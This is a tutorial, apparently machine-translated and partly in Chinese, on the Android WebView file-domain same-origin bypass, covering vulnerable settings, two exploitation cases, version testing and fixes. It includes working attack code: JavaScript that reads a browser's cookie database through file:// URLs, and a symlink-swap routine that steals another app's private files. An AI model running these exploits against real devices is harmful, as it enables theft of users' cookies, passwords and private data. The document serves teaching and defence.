Android Security Detection - WebView File Domain Same Origin Policy Bypass Vulnerability

In this chapter, we will learn about "WebView File Domain Same-Origin Policy Bypass Vulnerability".

1. Vulnerability principle

The delayed execution of JavaScript can bypass the same-origin check of the file protocol, and can access all private files of the victim application, that is, the delayed execution of Javascript through WebView and the deletion of the current Html file and the soft link pointing to other files can be read The file pointed to by the symbolic link is obtained, and then the HTML file is read again through JavaScript, so that the file pointed to by the symbolic link can be obtained. Most applications that use WebView will be affected by this vulnerability. Malicious applications can steal any private files of applications without special permissions through this vulnerability, especially browsers. By exploiting this vulnerability, they can obtain Sensitive information such as passwords, cookies, favorites, and history records, resulting in the leakage of sensitive information.
In fact, the most important point is that 通过符号链接和延时加载来产生此漏洞. In fact, this vulnerability can not only be generated through symbolic links, there are two ways to generate this vulnerability.

a. Through file cross-domain: directly reading (accessing) local files to generate this vulnerability
b. Bypassing the same-origin check of the file protocol: symbolic links and delayed loading to generate this vulnerability.

Two, WebView related knowledge

1. Allow WebView to access local html files: The main WebView.setAllowFileAccess(boolean allow)method is to control WebViewwhether it can access local html files

2. Allow the html loaded by WebView to use JS code: use WebView.getSettings().setJavaScriptEnabled(boolean enable)the method to control whether to allow the use of JS code

3. Allow the JS code loaded by WebView to access local files: Use WebView.getSettings().setAllowFileAccessFromFileURLs(boolean allow)either of WebView.getSettings().setAllowUniversalAccessFromFileURLs(boolean allow)or to control whether JS is allowed to use the file domain to access local files, 在Android4.0（API15）及以下默认为true，在Android4.0（API15）以上默认为false. One thing to note is that there are no setAllowFileAccessFromFileURLs and setAllowUniversalAccessFromFileURLs methods in Android 4.0 and below

注：
1. setAllowFileAccessFromFileURLs：设置是否允许通过file url加载的Javascript读取其他的本地文件
2. setAllowUniversalAccessFromFileURLs：设置是否允许通过file url加载的Javascript可以访问其他的源，包括其他的文件和http,https等其他的源。此API比setAllowFileAccessFromFileURLs多了一个跨域访问http和https等链接

Three, several situations of loopholes

The general usage scenario of this vulnerability is: APPit has WebView(browser function), and the component WebViewwhere it is located Activityhas component exposure (component export, android:exported=true), and receives an externally input URLlink, without verification URL, WebViewit is directly loaded, and finally WebViewthere are the following situations any kind.

1. Through file cross-domain: directly read (access) local files to generate this vulnerability
(1). Set WebView to allow the use of JS code: WebView.getSettings().setJavaScriptEnabled(true)
(2). Set WebView to allow access to local html files: WebView.setAllowFileAccess(true)
(3). Set to allow WebView to load JS code to access local files: WebView.getSettings().setAllowFileAccessFromFileURLs(true)orWebView.getSettings().setAllowUniversalAccessFromFileURLs(true)

#恶意APP的HTML代码
<html>
<body></body>
<script>
function loadDatabase()
{
      
      
    var file_url = "file:///data/data/com.xxx.browser/databases/webviewCookies.db";
    var xmlhttp =new XMLHttpRequest();
    xmlhttp.onload=function() {
      
      
 		document.body.appendChild(d.createTextNode(xmlhttp.responseText))
    	alert(xmlhttp.responseText);
    }
    xmlhttp.open("GET",file_url);
    xmlhttp.send(null);
}
loadDatabase();
</script>
</html>

#被攻击的APP，有漏洞的代码
WebView webView = findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(true);
webView.getSettings().setAllowFileAccess(true);  #允许加载File域
webView.getSettings().setAllowFileAccessFromFileURLs(true); 
//或webView.getSettings().setAllowUniversalAccessFromFileURLs(true); 

Intent i = getIntent();
if (i != null) {
    
    
     mUri = i.getData(); #取出了恶意HTML
}
if (mUri != null) {
    
    
    url = mUri.toString();
}
if (url != null) {
    
    
    webView.loadUrl(url); #加载了恶意HTML
}

2. This vulnerability is generated by bypassing the same-origin check of the file protocol: symbolic links and delayed loading
(1). Set WebView to allow the use of JS code: WebView.getSettings().setJavaScriptEnabled(true)
(2). Set WebView to allow access to local html files:WebView.setAllowFileAccess(true)

setAllowFileAccessFromFileURLsmethod and setAllowUniversalAccessFromFileURLsin this case set to false. In fact, no matter how you restrict the same-origin check of the file protocol, its javascript should be able to access the current file. By delaying the execution of javascript and replacing the current file with a soft link pointing to another file, you can read the file pointed to by the symbolic link. document.

#恶意APP的HTML,被检测APP加载此html，执行JS代码
<html>
<body></body>
<script>
var d = document;
function loadDatabase()
{
      
      
    var file_url = d.URL;
    var xmlhttp =new XMLHttpRequest();
    xmlhttp.onload=function() {
      
      
 		document.body.appendChild(d.createTextNode(xmlhttp.responseText))
    	alert(xmlhttp.responseText);
    }
    xmlhttp.open("GET",file_url);
    xmlhttp.send(null);
}
setTimeout(loadDatabase(),8000); #延迟8秒执行。利用时间差和软链接来获取被攻击APP的私有文件
</script>
</html>

#恶意APP的攻击代码
  try {
    
     
  		String HTML = "恶意APP的HTML,在上面的HTML代码";
  		#新建文件夹，用于存放恶意HTML文件
       	cmdexec("mkdir /data/data/mm.xxxxx.testdemo3/files");
       	#将恶意HTML到恶意APP的沙盒目录
        cmdexec("echo \"" + HTML + "\" >  /data/data/mm.xxxxx.testdemo3/files/attack.html");
        #授权目录及其文件权限，允许其它应用访问
        cmdexec("chmod -R 777 /data/data/mm.xxxxx.testdemo3/files");
        Thread.sleep(1000);
        #启动被攻击的APP，并携带恶意HTML
        invokeVulnAPP("file://" + HTML_PATH);
        #延时6秒
        Thread.sleep(6000);
        #删除HTML文件
        cmdexec("rm " + HTML_PATH);
        #软链接文件，实现读取被攻击应用的private.txt文件
        cmdexec("ln -s " + "/data/data/mm.xxxxx.testdemo3/files/private.txt" + " " + HTML_PATH);
  } catch (Exception e) {
    
    
      // TODO: handle exception
  }

#被攻击的APP，有漏洞的代码
WebView webView = findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(true);
webView.getSettings().setAllowFileAccess(true);  允许加载File域

Intent i = getIntent();
if (i != null) {
    
    
     mUri = i.getData(); #取出了恶意HTML
}
if (mUri != null) {
    
    
    url = mUri.toString();
}
if (url != null) {
    
    
    webView.loadUrl(url); #加载了恶意HTML
}

4. POC

There is no detailed POC here. Many articles on the Internet have these examples. The main test I do is 符号链接和延时加载产生的漏洞to affect those versions.
The Android native emulator is used here for testing, which is relatively rough and is for reference only. ( 在国产的部分定制ROM中有修复此漏洞)

The version tested here is from Android4.2（API17）to Android7.0（API24）, the result shows that Android7.0this vulnerability has been fixed in the version ( Android7.0修复此漏洞仅为猜测，不过从实际的运行来看确实没达到攻击的效果。估计是Android7.0引入了FileProvider所导致的，测试的代码最后也兼容了FileProvider), so the vulnerability affects about 小于Android7.0(API24). But it is not ruled out Android6.0that there are fixes in the minor version above.

5. Detection method

I won’t list them in detail, but the process of generating the vulnerability is explained in several situations , so just check it accordingly.

6. Repair method

1. The setting setAllowFileAccessmethod is false, set setAllowFileAccessFromFileURLsand setAllowUniversalAccessFromFileURLsas false.
2. Android4.0(API15)Other methods must be used to manually verify whether to access the file domain.
3. When WebViewthere Activityis component exposure, if it is not necessary for component exposure, component exposure should be prohibited

---

asjhan for Android reverse